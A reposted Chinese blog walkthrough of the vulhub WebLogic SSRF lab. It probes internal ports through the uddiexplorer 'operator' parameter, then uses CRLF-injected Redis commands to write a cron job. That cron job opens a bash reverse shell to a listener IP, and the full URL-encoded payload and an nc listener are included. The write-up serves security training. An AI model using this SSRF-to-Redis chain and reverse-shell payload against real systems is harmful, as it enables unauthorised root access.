当前位置: 首页 > news >正文

企业如何建公司网站青海省建设局网站

企业如何建公司网站,青海省建设局网站,连云港市网站平台,wordpress 友情链接文章目录 漏洞测试注入HTTP头,利用Redis反弹shell redis不能启动问题解决 Path : vulhub/weblogic/ssrf 编译及启动测试环境 docker compose up -dWeblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi…

文章目录

      • 漏洞测试
        • 注入HTTP头,利用Redis反弹shell
      • redis不能启动问题解决

Path : vulhub/weblogic/ssrf

编译及启动测试环境

docker compose up -d

Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件

访问http://127.0.0.1:7001/uddiexplorer/,无需登录即可查看uddiexplorer应用

image-20230904163330943

点击Search Public Registries

image-20230904163446567

来到http://127.0.0.1:7001/uddiexplorer/SearchPublicRegistries.jsp页面

image-20230904163509879

漏洞测试

打开BurpSuite测试,点击Search按钮

Ctrl+r发送到Repeater模块,观察数据包

image-20230904163944135

根据数据包的响应信息,可以猜测operator参数后面可以跟一个url地址

利用dnslog平台测试,生成一个域名

image-20230904164421851

image-20230904164534957

成功解析到,说明operator后面 可以做url地址请求,说明存在SSRF 漏洞

image-20230904164609873

访问一个可以访问的IP:PORT,如http://127.0.0.1:80

image-20230904165857585

发现80端口没有开放

在访问7001端口,

image-20230904170025501

通过错误的不同,即可探测内网状态。

环境是在docker上启动的,(docker环境的网段一般是172.*)

image-20230904190933559

注入HTTP头,利用Redis反弹shell

发送三条redis命令,将弹shell脚本写入/etc/crontab

反弹到kali上

set 1 "\n\n\n\n0-59 0-23 1-31 1-12 0-6 root bash -c 'sh -i >& /dev/tcp/192.168.80.141/21 0>&1'\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save

进行url编码

set%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20'sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.80.141%2F21%200%3E%261'%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave

注意,换行符是“\r\n”,也就是“%0D%0A”。

将url编码后的字符串放在ssrf的域名后面,发送:

http://172.19.0.2:6379/saury%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20'sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.80.141%2F21%200%3E%261'%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Asaury

kali开启监听:

nc -lvvp 21

bp发送请求

image-20230904191828695

等待计划任务生效

image-20230904191922530

成功拿到shell

redis不能启动问题解决

在使用sudo docker-compose up -d启动环境的时候,只启动了weblogic,没有启动redis

image-20230904192110033

修改如下配置

vim /etc/default/grub
GRUB_CMDLINE_LINUX_DEFAULT="vsyscall=emulate"

image-20230904192226991

:wq保存后,命令行运行update-grub

reboot重启,redis成功启动

解决方法来自:https://blog.csdn.net/weixin_43886198/article/details/111144854

http://www.yayakq.cn/news/126313/

相关文章:

  • 用html做网站的心得体会搭建网站内链系统
  • 积极参与网站信息建设工作手机端企业网站模板
  • 网络营销网站建设方案安卓应用开发工程师
  • php thml怎样做网站网页制作三剑客专家培训教程
  • 北京网站设计师培训室内设计联盟手机版
  • 哪些是asp网站建设部网站注销一级建造师
  • 现在写博客还是做网站收费企业邮箱哪家好
  • 网站建设职位域名要多少钱
  • 哈尔滨网站设计模板wordpress添加订阅会员
  • 北京规划建设 杂志 官方网站产品设计招聘网站
  • 做网站哪家专业泊头网站建设价格
  • 什么网站做ppt好做网站需要考虑哪些
  • 内蒙古住房城乡建设部网站贵阳营销型网站建设
  • 网盘资源电脑优化软件排行榜
  • 盘龙网站建设公司濮阳网站建设哪家好
  • 网站全站出售wordpress搭建是英文
  • 哪类网站流量大惠州建网站
  • 自己做的网页怎么连接到网站互联网保险的风险
  • 先做网站还是先解析企业门户源码
  • 百度代理公司珠海百度关键字优化
  • 内蒙古做网站的公司有哪些郴州网络推广教程
  • 中文网站做google广告怎么样wordpress微信分享网页带图
  • 谁做网站网页无法访问未连接上服务器
  • wap网站前台wordpress 移动端优势
  • 青岛建设局官方网站谷歌seo的推广
  • 自己做的网站能赚钱吗域名备案步骤
  • 网站建设维护的方案用wordpress上传源砖
  • 哪些网站做的好住房和城乡建设部建设司网站首页
  • 苏小小移动网站wordpress 简洁文章主题
  • 工具黄浦区seo网站建设